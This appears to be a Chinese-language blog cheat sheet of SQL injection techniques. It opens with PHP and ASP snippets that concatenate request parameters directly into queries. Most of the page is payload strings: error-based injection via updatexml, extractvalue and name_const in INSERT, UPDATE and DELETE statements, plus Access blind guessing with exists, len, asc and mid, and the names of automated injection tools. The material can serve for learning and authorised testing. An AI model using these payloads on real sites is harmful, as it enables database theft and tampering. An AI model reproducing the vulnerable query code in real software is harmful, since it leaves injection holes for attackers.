• insert注入

$user=$_GET['u']; $sql="INSERT INTO users (id,username,password) values (2,'$user','123456')"; Mysql_query($sql);

利用updatexml()获取数据
利用extractvalue()获取数据
利用name_const()获取数据
利用子查询注入获取数据

or updatexml(1,concat(0x7e,(version())),0) or insert into users (id,username,password) values (2,'admin' or updatexml(1,concat(0x7e,(version())),0) or'','Nervo');

or extractvalue(1,concat(0x7e,database())) or

or (select * from (select(name_const(version(),1)),name_const(version(),1))a) or

• update注入

​ 用户注册，密码修改，信息删除

​ 1、sql注入组合拼接，保证sql语句正常运行
​ 2、sql语句中闭合使用（符号或截断）
​ 3、每个不同注入方式和网站应用功能有关

update users set password='nicky' or updatexml(2,concat(0x7e,(version())),0) or'' where id=2 and username='user';

update users set password='nicky' or extractvalue(1,concat(0x7e,database())) or'' where id=2 and username='user';

update users set password='nicky' or (select * from (select(name_const(version(),1)),name_const(version(),1))a) or'' where id=2 and username='user';

• delete limit 注入

delete from users where id=2 or update users set password='nicky' or'';

delete from users where id=2 or extractvalue(1,concat(0x7e,database())) or'';

delete from users where id=2 or (select * from (select(name_const(version(),1)),name_const(version(),1))a) or'';

• Access 联合及逐字猜解

<% id=request("id") sql="select * from product where id="&id set rs=conn.execute(sql) %>

​ 1、猜解同mysql

猜不到：
​ 字典收集（社工）
​ Access 偏移注入
​ 猜解字典工具：明小子Domain

​ 2、access 攻击片段–逐字猜解 // 兼容好
​ 查表：and exists (select * from 表名)
​ 查列：and exists (select 列名 from 表名)
​ 查数据：
​ 1、确定长度
​ 2、确定asc数据(asc编码)

and (select top 1 len(列名) from admin)=5 and (select top 1 asc(mid(列名,位数,1)) from admin)=97

​ 工具 啊 D

1 2 3 4 5 6 7 8 9

------本页内容已结束，喜欢请分享------

感谢您的来访，获取更多精彩文章请收藏本站。